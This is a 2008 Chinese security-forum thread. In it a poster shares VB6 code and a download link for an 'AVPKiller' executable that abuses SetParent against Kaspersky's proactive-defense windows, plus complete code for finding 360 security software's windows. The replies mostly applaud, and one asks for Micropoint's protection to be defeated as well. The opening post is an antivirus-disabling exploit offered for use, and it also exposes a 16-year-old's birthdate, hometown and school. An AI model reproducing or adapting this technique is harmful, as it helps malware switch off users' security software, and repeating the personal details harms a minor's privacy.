微点交流论坛

标题: 【QQ517826104】(VB6)废掉卡巴主动防御KIS8 & KIS2009，试验成功！ [打印本页]

作者: 点饭的百度空间 时间: 2008-6-16 14:16 标题: 【QQ517826104】(VB6)废掉卡巴主动防御KIS8 & KIS2009，试验成功！

相关主题：
【QQ517826104】(VB6)超简单方法破解微点的自我保护（微点已封）
http://bbs.micropoint.com.cn/sho ... ghlight=QQ517826104

【QQ517826104】为什么SetParent还能用来过微点……
http://bbs.micropoint.com.cn/sho ... ghlight=QQ517826104

【QQ517826104】想打造个性化的微点.
http://bbs.micropoint.com.cn/sho ... ghlight=QQ517826104

【QQ517826104】 16岁
生日：  1992年 10月03日（天秤座）  血型：  A 出生地：  广西  -  贺州  -  钟山县
就读过的学校：  ZSYZ
个人简介：  A super VB lover

【QQ517826104】(VB6)废掉卡巴主动防御，试验成功！
两个Form，一个CommandButton （cmdKill）。没有Timer。

源码

Option Explicit
Private Declare Function IsWindow Lib "user32.dll" (ByVal hWnd As Long) As Long
Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Private****()
Dim i As Single
For i = 1 To ****# '遍历所有 hWnd
      If ****  '是可用的窗口
         Dim str As String
         str = Space(255)
         Call G****(i, str, 255)
         str = LCase(str)

         If InStr(*****<> 0 Then '是AVP的。。。
               Debug.Print str
               Load Form2 '调用 SetParent 漏洞攻击卡巴
               SetParent i, Form2.hWnd
               Unload Form2 '挂了，嘿嘿~
         End If

      End If
Next i
End Sub

最终可执行文件

AVPKiller.rar http://www.0ginr.com/bbs/att****t.php?aid=715 (13.27 KB) Important:

由于用的是For语句获取句柄，
会消耗大量系统资源！
运行时尽量关闭没用的程序，以免死机！！！
建议配置较低的机器不要随意尝试！！！

Update Notes:

其实我早就在做这个试验了，
不过一直没有成功——原因仅仅是漏了一行Code!!!

这个:
str = LCase(str)气死。。。
教训就是以后不管是考试还是写程序一定要细心！

说到考试，中考还剩几天了。。哎。。

附件：（转自同一博客的同一帖子的某两个评论）

找到360所有窗口的句柄（自我保护状态下，包括保险箱）。

Option Explicit
Private Declare Function IsWindow Lib "user32.dll" (ByVal hWnd As Long) As Long
Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Private Sub cmdKill_Click()
Dim i As Single
For i = 1 To 4294967294#
If IsWindow(i) <> 0 Then
Dim str As String
str = Space(255)
Call GetClassName(i, str, 255)
str = LCase(str)
If InStr(str, "360") <> 0 Then
Debug.Print "类名：" & str & "句柄：" & i
End If
End If
Next i
End Sub

MJ0011：楼上这方法会导致WIN32K系统占用大量内存，最终导致系统响应缓慢
正确的方法应是从hwnd中getnext的方式，或者用getwindow
classname也可从hwnd中获取，以防GetClassName函数被HOOK
可惜的是，就算你拿到窗口句柄，也并不能做什么了

[ Last edited by 点饭的百度空间 on 2008-12-2 at 17:17 ]

作者: huhensex 时间: 2008-8-20 08:18
支持楼主试验，笔者是菜鸟，看不懂源代码，仅从精神上支持了

作者: hljking 时间: 2008-8-21 15:14
强烈支持楼主!希望你更牛XXXX点

作者: putin 时间: 2008-8-22 15:18
希望你也能破掉微点的防御！

作者: qq200878 时间: 2008-8-22 16:04
见识过了

作者: 点饭的百度空间 时间: 2008-12-2 17:12
顶

作者: 独孤不平 时间: 2008-12-2 20:42

Quote:

Originally posted by 点饭的百度空间 at 2008-12-2 17:12:
顶

强大的人，自己顶自己，是不是有什么问题呢

作者: a0531101 时间: 2008-12-6 09:57
只看懂几行代码！:(

作者: dosschen 时间: 2009-4-23 03:09 标题: !!!!

顶吗！！！！

作者: 小小刀 时间: 2009-4-24 10:26

Quote:

Originally posted by 独孤不平 at 2008-12-2 20:42:

强大的人，自己顶自己，是不是有什么问题呢

楼主是转帖

作者: ChiChou 时间: 2009-4-25 11:10
路过……
据说AVP2010就没用了。
强大的FSD……
猥琐的MoveFXXXXX

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn